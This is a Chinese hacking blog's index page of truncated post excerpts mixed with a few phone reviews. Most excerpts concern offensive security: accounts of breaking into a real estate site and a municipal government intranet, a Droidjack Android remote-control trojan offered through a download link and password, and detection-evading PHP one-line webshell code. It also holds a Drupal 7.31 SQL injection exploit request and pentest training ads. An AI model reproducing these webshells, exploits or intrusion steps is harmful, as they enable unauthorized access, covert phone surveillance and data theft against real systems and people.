Strive 's Blog

 
   

一对一渗透培训课堂

各位进入这个博客一定也是志同道合的朋友,对着计算机技术与渗透技术有着极大的兴趣,从一开始接触计算机技术到现在也过去了六七个年头,在自学的过程中也经常走弯路,在这里我开启一对一的渗透培训,让大家少走弯路,学习到自己想学的技术!

培训内容:

渗透手法、思路

培养自主渗透思路

sqlmap/nmap/zmap/w3af/awvs等国外工具的使用

linux技术(包含linux服务器维护技术与kali linux渗透集成平台)

metasploit专项技术培训

代码审计教学


课程实时更新,都是最新给大家录制的,并且一对一辅导,拥有2个在线解答,可文字、语音、远程解答学习困惑,一...

 
 
 
   

友情检测某房产信息网

from:渗透吧吧友接地气


自先看一下目标站首页;如图1

【信息收集】
经过前期探测基本确定了网站的环境,
网站脚本语言:asp aspx
搭建平台:IIS7.0
数据库:mssql2008
操作系统:windows2008

搭建组合↓
asp+aspx+IIS7.0+Win2008+mssql2008

【服务器IP】
经过综合判断后确定真实IP为↓
76.24.xx.142

【CMS探测】↓
某房产管理系统

【环境漏洞信息探测】↓
经过一会的探测以后,得出以下的信息。

【弱点探测】
web端漏洞;↓
-----此CMS的sql注入漏洞
手工没探测出cms,后来用bugscan探测得到cms,并且百度到此sql注入漏洞。

结果...

 
 
 
   

国外黑客们的入侵网站思路

PS:非常棒的科普文,总之就是最最规范的渗透测试过程 收集信息 -> 发现主机 -> 诊断漏洞 -> 漏洞攻击 -> 深入渗透 ->报告说明


问题的答案看起来不那么确定,显而易见的是黑掉一个站点有很多种方法。在这篇文章,我们的目标是要给大家展示一下黑客是如何锁定并黑掉一个目标站点的!

让我们来看看目标站点:hack-test.com


先ping下站点所在服务器的IP:


现在我们有了目标站点所在服务器的IP了 — 173.236.138...

 
 
 
   

【52stu】 WEB安全培训 正式开启

大家好,从今天开始,我们52stu就和百度渗透吧与幽灵网安建立起合.作关.系。

我在做的这个培.训,是真正意义上的培.训,我们不仅教你 “WEB安全”的知识,更重要的是,我们将引领你走进一个大网络安全的殿堂,引导你如何在这个殿堂。

我们的培.训不会只告诉使用哪个手工去搞那些什么Access+asp的网站,我们做的是一个完整的、有深度的WEB安全工程师的培.训,说白了,就是可以到安全公司工作的那种。

详情:http://52stu.org

问:你们那有教什么东西呢?
答:准确来说,我们的教学涉及:windows的下渗透和linux下的渗透。

问:你们怎么教这么少?
答:这两个系统下的渗.透涵盖非常多...

 
 
 
   

锤子 Smartisan T2 是否定价高于情怀

与许多中小型手机厂商一样,2015 年锤子科技也迎来了转型,推出了走量的千元机坚果,可见情怀归情怀,公司还是要运营混口饭吃的,不然像什么大可乐之流只会遗落在历史的长河中。当然,光靠坚果也不行,低端机硬件成本的限制所带来的卡顿等问题也影响着锤子的口碑,所以年关将至锤子科技推出的了锤子 Smartisan T2 (以下简称锤子T2),T2 搭载了高通骁龙808(MSM8992) 这款处理器,如果用的是高通骁龙 810 我想都上市半年咯。高通810的发热耗电无疑坑了一堆友商,那么在 820 量产之前使用次旗舰808即是唯一且最佳的选择,而使用 808 的可不止锤子一家,所以我...

 
 
 
   

极客范 VS 小清新,iOS 9 与安卓 6.0 大比拼

iOS9正式版如期而至,安卓6.0和Win10 Mobile的正式版也应该会在接下来的几个月推出,新版移动操作系统的更新大战一触即发。面对紧紧追赶的微软,在移动领域布局已经非常完善的苹果和谷歌都对今年新系统更新的幅度保持克制,新版系统主要针对细节和智能功能进行了优化。两大移动平台的霸主,你更欣赏哪一个的风格呢?IT之家带来两款系统截图的对比供大家直观感受。


1.    锁屏界面


iOS9和安卓6.0的锁屏界面相比各自老版本没有什么变化,iOS9锁屏界面可以右滑进入桌面,安卓右下角相机图标上滑打开拍照应用,长按HOME键启动siri。安卓6.0...

 
 
 
   

致命弱口令到市政府内网渗透

昨晚凌晨:
我们在团队里聊内网渗透,聊得兴起,迫切得想写一篇内网渗透的帖子

所以就有了这篇比较简单的“Windows内网渗透“

如果有好的目标可以让我试着深入一下,一直想写一篇”高大上的Linux内网渗透“

目标:某政府内网
难度:简单
目的:没有分享,就没有收获
靶场:为了避免法律责任,所以打码了。如果有侧漏的地方请告知!

正文:


 
要不说还是御剑好用呢?这不是传说中的ewbeditor编辑器吗。
jsp的很少见,可以爆破、可以社工


 
但是凭借我多年的渗透经验、敏锐的分析能力断定:这就是弱口令


 
非常不巧的是,我没有猜错。添加jsp,哎哟不错哦!上传之!...


 
 
 
   

关于 Android 和 iOS 流畅度的一切

写在前面的一些话:


如果觉得概念太多看不下去就直接看加粗部分就够了。


我希望大家读完我的这篇帖子后,是这样的:


而不是:


我们应该为这个世界的多样性而感到庆幸,不是么?


一、什么是流畅?什么是卡顿?

如果我们讨论流畅和卡是建立在不同的标准上,一定会变成毫无意义的口水战。在这里,流畅我们定义为运行程序时达到 60fps 或以上的绘制效率,且尽可能少丢帧。卡顿我们定义为程序运行时无法达到 60fps,丢帧频繁。


二、Apple 和 Android阵营 比是不是能带来更流畅的应用体验?

不是。两者都非常顺滑,用久了也都不卡顿。Android...

 
 
 
   

强大的安卓手机远程管理工具 – Droidjack

Droidjack是一款针对安卓手机远程管理工具,你可以利用它在PC上对手机进行远程操控,不仅功能强大,使用也很方便。


功能特性

1、可以生成一个APK,绑定在被控手机的任何APP上2、可在电脑端控制手机,包括浏览、传输、删除文件等3、可进行SMS短信收发和查看功能4、可以控制手机的电话功能5、联系人管理6、麦克风监听7、GPS定位8、APP管理

测试截图

生成的软件



百度网盘 链接:http://pan.baidu.com/s/19Ec2M 密码: tegv

解压码 jystrive.lofter.com


 
 
 
   

过狗过盾无特征无动态函数PHP一句话

分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)

原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
所有一句话使用方法基本都是:
http:// target/shell.php?e=assert 密码pass

01
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, $e);

02
$e = ...

 
 
 
   

Sqlmap进阶用法:定制payload加速boolean-based注入

来源:FreeBuf

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用。

大家在玩SQL注入的时候大概都遇到过一种特别鸡肋的情况:目标只有支持多语句查询的boolean-based注入点(比如CVE-2014-3704)。我们很单纯地想下载数据库,却只能用sqlmap10线程一位一位获取。这样的龟速根本就是反人类!那边跑着sqlmap这边还不能溜掉,说不定就要你按个“Y”。

不过,既然支持多语句就有另一种思路可以提速:把注入语句的执行结果update到另一个可见页面上,这样就可以直接获取注入语句的输出了。然而sqlmap本身并没有这个功能。


本文主要向...

 
 
 
   

电影中真实存在的无线黑客技术

来源:习科论坛

习科发布者:mobi

前段时间在微博上看到tk教主貌似想拍黑客题材的电影,还有看《战狼》等等不忍直视的电影,另外阿里把“在XX电影中出现在那种黑客技术”作为面试题之一。于是乎我就写下了这篇文章盘点在电影中真实存在的无线hack技术。

《我是谁 – 没有绝对安全的系统》

首先说下《我是谁 – 没有绝对安全的系统》的主人公本杰明,通过社工进入到目标公司的员工饭堂,放置一个自己DIY设备。

其中提到的“evil twin”不是设备名,而是一种攻击手法,通俗来讲就叫无线钓鱼。

精心的伪造了一个钓鱼的页面...

 
 
 
   

PHP multipart/form-data 远程DOS漏洞

作者:LiuShusheng_0_

PHP解析multipart/form-datahttp请求的body part请求头时,重复拷贝字符串导致DOS。远程攻击者通过发送恶意构造的multipart/form-data请求,导致服务器CPU资源被耗尽,从而远程DOS服务器。
影响范围:
PHP所有版本

漏洞poc

  1. '''

  2. Author: Shusheng Liu,The Department of Security Cloud, Baidu

  3. email: liusscs@163.com

  4. /* <![CDATA[ */!function(){try{var...

 
 
 
   

零基础学习虚拟机

飞飞老师的教程,我多年的好友,也是一名良师,虽然目前已经淡出网络,当是他的优秀教学肯定都看过,这个是他目前公开的教视频教程之一。

在线观看

 
 
 
   

Discuz的一处越权操作,强制回复无权限帖子

合购vip  等教程论坛  都用的是Discuz

看操作步骤:


随便找一处vip教程


接下来 我们审查元素


找到这段代码  

然后修改

  1. <a href="http://xxx.xxx.xxx/forum.php?mod=post&amp;action=reply&amp;fid=170&amp;tid=9310" onclick="showWindow('reply', this.href)">回复</a>

复制代...
 
 
 
   

另类Webshell:Xml Shell简介

想来想去还是归结成一个系列吧,虽然说在现在各种讲究高大上的时代还谈webshell实在是一种没什么品味的做法。

基本上也就是一些新型webshell、特殊环境下的特殊利用、特殊webshell的菜刀中转脚本等,外带一些对应的分析。

先挖个坑,至于填坑么……看情况吧。

0x01 xml与xslt

相信所有人对xml都不陌生,其被广泛的应用于数据数据传输、保存与序列化中,是一种极为强大的数据格式。

强大必然伴随着复杂,xml在发展中派生出了一系列标准,包括DTD、XSD、XDR、XPATH以及XSLT等。

XSLT全称为拓展样式表转换语言,其作用是通过指定的规则,将一个xml文档转换为...

 
 
 
   

浅谈CSRF挖掘与利用

关于CSRF漏洞,我想不需要太多的介绍了,大家可以在网上翻翻相关资料,最近也挖了几个CSRF就给大家介绍一下吧。



当然我这里主要是实站,所以没有那么多冠冕堂皇的语言,本人文笔不好,大家且慢慢体会吧。

这里我要引用一篇文章的几句话了:

一.CSRF是什么?

CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。

二.CSRF可以做什么?

你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取...

 
 
 
   

sqlmap与burp结合

视频由iverson5录制~

http://pan.baidu.com/s/1hq5UDwC 密码:pcbh

 
 
 
   

快讯:Drupal 7.31版本爆严重SQL注入漏洞

今早有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。

测试代码:(请勿用于非法用途)

POST /drupal-7.31/?q=node&destination=node HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0Accept...
 
 
 
   

一个注入小技巧:利用子查询忽略字段名

条件:已知表名,字段名未知,数据库本身支持子查询
对付access比较有用,也可以用来偷懒,比如从各种ctf的flag表里面读数据
思路:在子查询里面写针对目标表的联合查询:第一个查询以常量为每一个字段占位,同时指定别名;紧随其后的联合查询查询目标表所有字段(*);最后对这个子查询的结果集进行联合查询或盲注。
例如有注入点:

[SQL] 纯文本查看 复制代码

selecttitle,time,author,content fromarticle whereid={inject here}
字段为四,已知表名admin,admin字段未知
先猜测admin表字段总数,在子查询中加入order by...